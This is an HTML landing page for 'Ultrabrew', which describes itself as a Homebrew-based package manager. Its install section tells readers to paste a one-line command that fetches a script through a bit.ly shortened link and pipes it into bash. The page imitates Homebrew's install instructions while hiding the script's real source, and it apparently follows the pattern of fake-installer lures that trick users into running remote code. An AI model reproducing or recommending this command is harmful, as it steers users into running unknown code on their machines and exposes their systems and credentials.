
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ultrabrew</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #121212;
            color: #ffffff;
            text-align: center;
            padding: 50px;
        }
        h1 {
            font-size: 3em;
            color: #f1c40f;
        }
        p {
            font-size: 1.2em;
            margin-top: 20px;
        }
        code {
            display: block;
            background-color: #2c2c2c;
            padding: 15px;
            border-radius: 8px;
            margin-top: 20px;
            font-size: 1em;
            color: #00ffcc;
        }
        a {
            color: #3498db;
            text-decoration: none;
        }
        a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <h1>Ultrabrew</h1>
    <p>“The Homebrewer you always needed”, Installer at <a href="https://bit.ly/installbrewe" target="_blank">https://bit.ly/installbrewe</a></p>

    <p>Ultrabrew is a Homebrew based package manager for macOS/Linux</p>

    <h2>Install</h2>
    <code>/bin/bash -c "$(curl -fsSL https://bit.ly/installbrewe)"</code>

    <p>Paste that in a macOS Terminal or Linux shell prompt to install Ultrabrew.</p>
</body>
</html>
